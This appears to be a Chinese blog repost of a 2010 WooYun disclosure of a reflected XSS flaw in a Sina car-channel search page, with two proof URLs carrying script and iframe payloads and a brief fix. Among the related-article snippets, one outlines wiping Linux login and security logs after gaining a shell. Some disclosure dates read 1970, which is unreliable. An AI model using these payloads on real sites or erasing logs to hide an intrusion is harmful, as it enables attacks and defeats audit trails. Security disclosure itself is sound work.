新浪某频道XSS漏洞

最新推荐文章于 2024-05-20 17:04:51 发布
最新推荐文章于 2024-05-20 17:04:51 发布
阅读量4.5k 收藏
点赞数
文章标签: web安全 网络安全 安全 hack wooyun
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jd_cx/article/details/124188796
版权

漏洞详情

披露状态:

2010-07-28: 细节已通知厂商并且等待厂商处理中
1970-01-01: 厂商已经确认,细节仅向厂商公开
1970-01-11: 细节向核心白帽子及相关领域专家公开
1970-01-21: 细节向普通白帽子公开
1970-01-31: 细节向实习白帽子公开
2010-08-27: 细节向公众公开

简要描述:

新浪某频道XSS漏洞

详细说明:

对搜索的字符未进行有效的处理过滤 造成XSS漏洞

漏洞证明:

http://che.sina.com.cn/apps/index.php?homo=off&mod=auto&act=sinaresult&type=search&query="><script>alert()</script>&service=cars
http://che.sina.com.cn/apps/index.php?homo=off&mod=auto&act=sinaresult&type=search&query="><iframe src=http://www.baidu.com></iframe>&service=cars


可直接进行弹窗iframe等常见跨站攻击方式。

修复方案:

对搜索的字符进行过滤处理即可。

版权声明:转载请注明来源 xixi@乌云

Sword-heart
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
JSP使用过滤器防止Xss漏洞
10-17
主要为大家详细介绍了JSP使用过滤器防止Xss漏洞,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
微博XSS攻击事件
TERRY的技术日志
06-29 3473
6月28日20时14分左右开始,微博出现了一次比较大的XSS攻击事件。大量用户自动发送诸如:“郭美美事件的一些未注意到的细节”,“建 党大业中穿帮的地方”,“让女人心动的100句诗歌”,“3D肉团团高清普通话版种子”,“这是传说中的神仙眷侣啊”,“惊爆!范冰冰艳照真流出了”等等 微博消息和私信,并自动关注一位名为hellosamy的用户。  事件的经过线索如下:20:14,开始有大量带
微博曾经受到过xss蠕虫攻击
gaisidewangzhan1的博客
05-15 1426
2)蠕虫微博曾经受到过xss蠕虫攻击,代码如下[javascript] view plain copyfunction createXHR(){      return window.XMLHttpRequest?      new XMLHttpRequest():      new ActiveXObject("Microsoft.XMLHTTP");  }  function getap...
[转]以为例浅谈XSS
weixin_30279671的博客
01-12 68
随着网络时代的飞速发展,网络安全问题越来越受大家的关注,而SQL注入的攻击也随着各种防注入的出现开始慢慢的离我们而去,从而XSS跨站脚本攻击也慢慢的开始在最近几年崛起,也应对了’没有绝对的安全’这句话。 XSS攻击:它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。 大家刚接触XSS的时候和我大概也差不多,都是在不断的在各种搜索栏,地址栏中或...
为例浅谈XSS
Coisini的博客
06-21 229
随着网络时代的飞速发展,网络安全问题越来越受大家的关注,而SQL注入的攻击也随着各种防注入的出现开始慢慢的离我们而去,从而XSS跨站脚本攻击也慢慢的开始在最近几年崛起,也应对了’没有绝对的安全’这句话。 XSS攻击: 它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。 大家刚接触XSS的时候和我大概也差不多,都是在不断的在各种搜索栏,地址栏中或...
安全测试之XSS攻击
weixin_40966030的博客
07-14 365
一、XSS攻击的概念 XSS的攻击方式就是想办法“教唆”用户的浏览器去执行一些这个网页中原本不存在的前端代码 二、XSS攻击的现象 2011年就曾爆出过严重的xss漏洞,导致大量用户自动关注某个微博号并自动转发某条微博。 三、XSS攻击的防范 1、首先是过滤。对诸如< img> < script> < a>等标签进行过滤。 2、其次是编码。像一些常见的符号,如<>在输入的时候要对其进行转换编码,这样做浏览器是不会对该标签进行解释执行的,同时也不影响显示效果
discuz X25 某功能存在 xss漏洞以及解决方案
09-28
discuz X25 某功能存在 xss漏洞 html 脚本未过滤
百度编辑器解决xss漏洞
03-01
百度编辑器解决xss漏洞
Web应用进行XSS漏洞测试
03-03
对WEB应用进行XSS漏洞测试,不能仅仅局限于在WEB页面输入XSS攻击字段,然后提交。绕过JavaScript的检测,输入XSS脚本,通常被测试人员忽略。下图为XSS恶意输入绕过JavaScript检测的攻击路径。XSS输入通常包含...
web安全之登录框渗透骚姿势,思路
qq_47289634的博客
05-10 644
越权漏洞的挖掘大部分是通过对比两个用户的请求包以及响应包,来观察不同之处,有的时候替换一下响应包就直接越权,其中特别要关注的是uid,这里在挖掘逻辑漏洞和越权漏洞时建议使用burp中的compare模块进行两个数据包的比对,非常直观。width=500&height=100导致可以随意更改大小,配合脚本批量请求,很容易就会把带宽占满,造成dos攻击。不管漏洞挖掘还是挖SRC,登录框都是重点关注对象,什么漏洞都有可能出现,登录框也是框,见框就插就对了,说不定会有奇效。看到登录框,输入信息后,抓包。
了解网络安全行业内有哪些公司?
aheyor的博客
05-14 956
https://wenku.baidu.com/view/8de38c790440be1e650e52ea551810a6f424c80f?aggId=f2f58cc8e618964bcf84b9d528ea81c758f52ecc&fr=catalogMain_text_ernie_recall_feed_index%3Awk_recommend_main4&_wkts_=1715651666515&bdQuery=%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85
Web安全:企业如何抵御常见的网络攻击?
m0_66326520的博客
05-16 702
针对网站的攻击有多种形式,攻击者既可以是业余黑客,也会是协同作战的职业黑客团伙。最关键的一条建议,就是在创建或运营网站时不要跳过安全功能,因为跳过安全设置可能会造成严重后果。虽然不可能完全消除网站攻击风险,但你至少可以缓解遭攻击的可能性和攻击后果的严重性。遭受攻击后,不仅需要及时的响应处置还需要避免同类事件的发生,因此事后的复盘分析尤为重要,做好安全防护才是最高效的网络攻击解决方案。
【网络安全】Linux 应急响应-溯源-系统日志排查知识点
weixin_43822401的博客
05-17 333
编辑或;
【网络安全】系统日志清理的操作步骤
weixin_43822401的博客
05-16 194
如果访问了某些服务,比如说通过 apache 服务获得一个 shell,你还需要清理 apache 服务的访问日。删除登录成功记录:echo > /var/log/wtmp (此时执行 last 命令就会发现没有记录)仅本地清理,如果目标服务存在日志服务器的话,所有日志还会被保留。这里仅清理系统相关日志,3. 删除日志记录:echo > /var/log/secure。删除登录失败记录:echo > /var/log/btmp。删除系统日志目录下的一些日志文件。1. 访问失败的日志。2. 访问成功的日志。
什么是蜜罐,在当前网络安全形势下,蜜罐能提供哪些帮助
dexunyun的博客
05-16 792
要建立一个成功的蜜罐系统,需要经过详细的规划和设计,并且与专业的安全团队合作,德迅云安全会根据用户的需求和威胁情报,选择合适的蜜罐类型和部署位置。而蜜罐就是其中重要的举措,旨在提供额外的安全层。蜜罐可以记录攻击者的工具、技术和过程信息,通过分析攻击者的行为、技术和策略,可以获取关于的攻击向量、漏洞和威胁情报的重要信息。低交互蜜罐:低交互蜜罐只模拟了系统的一部分功能,通常只包括网络服务和部分应用程序,为攻击者提供简单的交互,配置简单,容易部署,但受限于交互能力,可能无法捕获高价值的攻击。
2024年网络安全威胁
dexun123的博客
05-15 820
随着2024年的到来,数字世界的版图正在以前所未有的速度扩张,引领我们进入一个技术革时代。然而,这飞速的发展同时也催生了一系列错综复杂的网络安全挑战。在这个数字平台与我们生活日益紧密交织的时代,深入了解这些兴的威胁,并预先做好相应的准备,不仅是审慎之举,更是明智之策。这一任务已然刻不容缓。今年,网络安全领域正处在一个至关重要的转折点。我们所面对的威胁不仅在技术上日益尖端,而且在手法上也愈发狡猾和隐蔽。勒索软件对组织构成的威胁是极其严重的,其潜在影响可能是毁灭性的。
【网络安全】【Frida实战案例】某图xx付费功能逆向分析(一)
IT痴者
05-13 351
本次主要是日志分析,查看日志对应执行流程。查看关键信息。
简析网络风险量化的价值与应用实践,如何构建网络风险预防架构
最新发布
Dexun_chuqi的博客
05-20 864
量化是指对事物数量的统计表达或测量。当其应用于网络安全风险分析时,就意味着从业务发展的角度去度量组织的网络风险暴露情况和该风险的潜在危害影响。换句话说,它是用一种数学术语来定量化描述网络风险态势。网络风险量化(CRQ)需要应用先进的建模技术来全面评估企业中的隐藏风险和暴露风险可能性,以及如何应对可能的危害。然后,这些信息被用来计算财务风险,以得出估计的损失。如果组织不解决安全项目中的一些特殊缺口,可能造成的经济损失会有多大?什么样的网络安全事件会导致最严重的业务影响?
xss网站寻找xss漏洞
08-29
寻找XSS漏洞的方法可以通过手工挖掘、工具挖掘和代码审计三个部分来进行。在手工挖掘中,可以参考中提供的实践案例,通过快速找出网站中可能存在的XSS漏洞。工具挖掘可以使用一些专门用于漏洞扫描的工具,例如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值